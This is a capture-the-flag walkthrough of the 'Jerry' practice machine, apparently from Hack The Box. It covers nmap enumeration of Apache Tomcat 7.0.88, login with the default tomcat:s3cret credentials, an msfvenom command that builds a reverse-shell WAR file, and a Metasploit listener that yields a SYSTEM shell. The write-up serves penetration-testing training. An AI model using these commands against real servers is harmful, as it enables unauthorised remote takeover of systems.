Jerry

Jerry is a beginner box that tests a user’s ability to enumerate running services, locate default credentials, and generate exploit shellcode.

Step 1: Enumerate with NMAP

We first run NMAP against the target to see what ports are open and which services are running.

➜  jerry nmap -A -v 10.129.136.9 -Pn -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2023-01-20 14:50 EST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:50
Completed NSE at 14:50, 0.00s elapsed
Initiating NSE at 14:50
Completed NSE at 14:50, 0.00s elapsed
Initiating NSE at 14:50
Completed NSE at 14:50, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 14:50
Completed Parallel DNS resolution of 1 host. at 14:50, 0.00s elapsed
Initiating Connect Scan at 14:50
Scanning 10.129.136.9 [65535 ports]
Discovered open port 8080/tcp on 10.129.136.9
Connect Scan Timing: About 20.11% done; ETC: 14:53 (0:02:03 remaining)
Connect Scan Timing: About 48.46% done; ETC: 14:53 (0:01:05 remaining)
Completed Connect Scan at 14:52, 104.31s elapsed (65535 total ports)
Initiating Service scan at 14:52
Scanning 1 service on 10.129.136.9
Completed Service scan at 14:52, 6.07s elapsed (1 service on 1 host)
NSE: Script scanning 10.129.136.9.
Initiating NSE at 14:52
Completed NSE at 14:52, 1.00s elapsed
Initiating NSE at 14:52
Completed NSE at 14:52, 0.12s elapsed
Initiating NSE at 14:52
Completed NSE at 14:52, 0.00s elapsed
Nmap scan report for 10.129.136.9
Host is up (0.023s latency).
Not shown: 65534 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

NSE: Script Post-scanning.
Initiating NSE at 14:52
Completed NSE at 14:52, 0.00s elapsed
Initiating NSE at 14:52
Completed NSE at 14:52, 0.00s elapsed
Initiating NSE at 14:52
Completed NSE at 14:52, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.05 seconds

We can see that Apache Tomcat is running on port 8080. Let’s try opening this page in a browser at http://10.129.136.9:8080.

Step 2: Searching for Default Credentials

We then noticed the manager app link on the right and tried to log in with potential default credentials, admin:admin. This attempt fails, but we are presented with documentation that may provide another default credential, tomcat:s3cret. We are able to log into the manager app with the newly found credentials.

Step 3: Generate Reverse Shell Exploit Code and Start Listener

Upon logging in we are presented with a lot of information, but the WAR file upload form sticks out as a potential attack vector.

With this knowledge in hand, we can use MsfVenom to generate a reverse shell to give us access to the server.

➜  jerry msfvenom -p java/shell_reverse_tcp LHOST=10.10.14.86 LPORT=4444 -f war > jerry.war
Payload size: 13316 bytes
Final size of war file: 13316 bytes

We will also need a listener to catch the request from the victim server, so we can use Metasploit to simplify this process.

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload java/shell_reverse_tcp 
payload => java/shell_reverse_tcp
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (java/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > set lhost tun0
lhost => 10.10.14.86
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.86:4444 
[*] Command shell session 1 opened (10.10.14.86:4444 -> 10.129.136.9:49192) at 2023-01-20 15:09:46 -0500

We are using a handler with a Java tcp reverse shell payload to catch the shell from the WAR file we uploaded to the server earlier. We simply supply the ip address/interface of the attacking machine and the port on which we are listening for a connection. Afterwards, we can run the exploit and wait for the victim server to connect.

Step 4: Exploit Target

We can visit the following link to force the victim server to load the WAR file into memory and execute our exploit: http://10.129.136.9:8080/jerry/. Our listener then updates to the following, indicating that we have a connection to the victim.

C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system

We can then run the whoami command to confirm that we have elevated privileges on the system. With this done, all that is left is to navigate to each user’s desktop and collect the flags.

Step 1: Enumerate with NMAP#

Step 2: Searching for Default Credentials#

Step 3: Generate Reverse Shell Exploit Code and Start Listener#

Step 4: Exploit Target#

Step 1: Enumerate with NMAP

Step 2: Searching for Default Credentials

Step 3: Generate Reverse Shell Exploit Code and Start Listener

Step 4: Exploit Target